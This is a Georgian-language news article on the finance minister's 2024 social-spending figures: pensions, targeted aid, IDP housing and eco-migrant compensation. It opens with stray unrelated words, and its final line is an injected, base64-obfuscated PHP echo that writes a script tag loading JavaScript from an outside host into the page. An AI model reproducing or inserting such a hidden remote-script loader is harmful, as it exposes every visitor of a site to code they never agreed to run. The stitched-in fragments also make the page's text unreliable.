celsiusi
ავერსი შნაიდერი

ფინანსთა მინისტრის განცხადებით, 2024 წელს სოციალური პროგრამების დასაფინანსებლად, ჯამში, გათვალისწინებულია 6 მილიარდ 460 მილიონი ლარი. მისი თქმით,  ბოლო 4 წელიწადში სოციალური პროგრამების დაფინანსება გაზრდილია თითქმის 80%-ით.

2024 წელს 3 მილიარდ 930 მილიონი ლარი გათვალისწინებულია პენსიებისა და სახელმწიფო კომპენსაციების დაფინანსებისთვის; 1 მილიარდ 519 მილიონი ლარია გამოყოფილი მიზნობრივი სოციალური ჯგუფების დახმარებებისთვის; 430 მილიონი ლარი მიიმართება საპენსიო სქემის თანადაფინანსებაზე; მუნიციპალური სოციალური პროგრამების დაფინანსება შეადგენს 300 მილიონ ლარს; დასაქმების ხელშეწყობის პროგრამისთვის გამოყოფილია 104 მილიონი ლარი, ხოლო მაღალმთიან დასახლებებში მცხოვრებთათვის კანონით განსაზღვრული გასაცემლების დასაფინანსებლად, გათვალისწინებულია 102 მილიონი ლარი; 76 მილიონი ლარი მიიმართება სოციალური რეაბილიტაციისა და ბავშვზე ზრუნვის პროგრამების დაფინანსებაზე.

ხუციშვილის განცხადებით, მიმდინარე წელს დაიწყო 7 ათას ბინაზე გათვლილი დევნილთა საცხოვრებელი კომპლექსების მშენებლობა.

მისი თქმით, დევნილთა განსახლების პროგრამის ბიუჯეტი მიმდინარე წელს გაორმაგდა და შეადგენს 230 მილიონ ლარს.

„გაზრდილი დაფინანსება შენარჩუნებულია 2024 წელსაც. გამოყოფილი თანხის ფარგლებში, გრძელდება „სოფლად სახლის“ პროგრამით იძულებით გადაადგილებული ოჯახებისთვის სახლების შესყიდვა. ჯამში, სამი წლის განმავლობაში დაგეგმილია 13 ათასი დევნილი ოჯახის საცხოვრებლის მშენებლობა/შესყიდვა. ეკომიგრანტთა მხარდაჭერის მიზნით, გამოყოფილი იყო 8,0 მლნ ლარი, თუმცა ამ პროგრამას დაემატა 15 მილიონი ლარი. დამატებული თანხა მიიმართება მიმდინარე წელს გურიაში მომხდარი სტიქიის შედეგად დაზარალებული იმ ოჯახების კომპენსაციებზე, რომელთაც დაუზიანდათ საცხოვრებელი სახლები და ეს სახლები არ ექვემდებარება რეაბილიტაციას. როგორც იცით, ამავე საჭიროებისათვის წელს უკვე გამოვყავით 15 მილიონი ლარი და ჯამურად აღნიშნული დაფინანსება სრულად მოაგვარებს არსებულ გამოწვევებს“, - განაცხადა ფინანსთა მინისტრმა, ლაშა ხუციშვილმა.

165
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");